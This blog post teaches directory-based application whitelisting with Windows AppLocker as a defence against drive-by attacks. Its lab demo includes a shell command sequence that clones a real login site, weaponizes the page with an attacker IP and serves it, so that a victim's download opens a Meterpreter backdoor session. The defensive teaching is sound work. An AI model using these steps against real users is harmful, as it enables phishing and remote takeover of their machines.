John Strand //
I have quite a few calls with customers who do not know where to begin when it comes to application whitelisting.
Often, the approach some organizations take is to try and implement full application whitelisting on every single application across their entire environment. While this goal is fun and seems like a good idea, it is not.
But…. But Why?
Because the overhead is insane. It is almost a full-time job keeping up with all the changes and working through patches. Some organizations try to buy a product that does this for them.
This almost never works.
Quit reaching for the easy button. Every time you do, God deploys another bot on your network out of spite.
And, he is a vengeful God.
Don’t make him angry.
Rather, we should ask is there a way we can get 80% of the way there? Is there a way to implement some level of whitelisting that will stop 95%+ of drive-by attacks?
In this blog, we are going to cover how we can implement whitelisting based on directory using Windows AppLocker.
But first, let’s see what happens when we do not have AppLocker running. We will set up a simple backdoor and have it connect back to the ADHD system. Remember, the goal is not to show how we can bypass EDR and Endpoint products. It is to create a simple backdoor and have it connect back.
By the way, for this, we will be using ADHD. You can find it here:
Also, we are just going to show this on a default Windows 10 system. No AV. The goal of this blog is to walk through AppLocker. Not bypass AV.
Want to bypass AV? Check the following webcast out:
First, we need some malware.
Thankfully, we have a couple of scripts that greatly simplify this process. Please make sure both your Windows and your Linux systems are running.
On your Linux system, please run the following command:
Please note the IP address of your Ethernet adapter.
Please note that my adapter is called ens33 and my IP address is 192.168.123.128. Your IP Address and adapter name may be different.
Please note your IP address for the ADHD Linux system below:
Now, run the following commands to start a simple backdoor and backdoor listener:
$ sudo su - # cd /opt/java-web-attack/ # ./clone.sh https://gmail.com # ./weaponize.py index.html 192.168.123.128 <<<--- Your IP will be different!!!! # ./serve.sh
Now, let’s surf to your Linux system from your Windows system, download the malware and run it!
Now, when you go back to your ADHD Linux system, you should see a Meterpreter session:
Now, let’s stop this from happening!
First, let’s configure AppLocker. To do this, we will need to access the Local Security Policy on your Windows system as an Administrator account.
Simply press the Windows key (lower left hand of your keyboard, looks like a Windows Logo), then type Local Security. It should bring up a menu like the one below. Please select Local Security Policy.
Next, we will need to configure AppLocker. To do this, please go to Security Settings > Application Control Policies and then AppLocker.
In the right-hand pane, you will see there are 0 Rules enforced for all policies. We will add in the default rules. We will choose the defaults because we are far less likely to brick a system.
Please select each of the above Rule groups (Executable, Windows Installer, Script, and Packaged) and for each one, right-click in the area that says “There are no items to show in this view” and then select “Create Default Rules.”
This should generate a subset of rules for each group. It should look similar to how it does below:
Now, we will need to start the Application Identity Service. This is done by pressing the Windows key and typing Services. This will bring up the Services App. Please select that and then double-click “Application Identity.”
Once the Application Identity Properties dialog is open, please press the Start button. This will start the service.
Now we need to create a standard user account on your Windows system. I called mine whitelist.
Next, log out as Administrator and log back in as whitelist.
Now, let’s surf to your Linux system, download the malware and try to run it again.
You should get an error.
The goal of this is to show just how easy it is to create default rules based on directory path.
Is this 100% effective? Nope. Not even close. Will it stop a tremendous amount of drive by attacks and make most penetration testers cry?
By the way, are you looking for a webcast on how to implement this via Group Policy in Active Directory?
Cool. Check this out: